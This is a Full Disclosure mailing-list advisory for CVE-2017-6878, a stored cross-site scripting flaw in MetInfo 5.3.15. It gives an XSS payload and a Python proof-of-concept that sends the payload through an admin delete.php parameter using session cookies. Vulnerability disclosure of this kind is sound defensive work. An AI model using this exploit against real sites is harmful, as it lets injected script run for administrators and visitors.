Full Disclosure mailing list archives

[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting


From: 陈彦羽 <callarice () 163 com>
Date: Sat, 18 Mar 2017 00:50:29 +0800 (CST)

Hello:
The following is my application vulnerabilities.
---------------------------------------
---------------------------------------
[CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting
Application: MetInfo
Versions Affected: 5.3.15
Vendor URL: http://www.metinfo.cn/
Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip
Bugs: Stored XSS
Author:Arice.chen(DBAPPSecurity Ltd)
Description:
MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their 
own enterprise website.


Vulnerability details:
To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)>
Then the background access to relevant pages, or other users access to the front desk page will make the attack code is 
executed.
---------------------------------------------
E-mail:callarice () 163 com
DBAppSecurity Ltd
www.dbappsecurity.com.cn


POC:
import requests
url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img 
src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2,"
headers = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) 
Version/5.1 Safari/534.50",
 }
cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24",
  recordurl="",
  met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ",
  met_key="pnZh0Fw",
  langset="cn",
  upgraderemind="1",
  tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list"
  )
s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False)
if s.status_code==200:
  print 'Success'


Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background.
The problem find is delete.php?name_2=
payload is :<img src=x onerror=alert(2)>


If after the success of the insert JavaScript, to several places in the background and other users access to the front 
desk page to attack code execution


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread: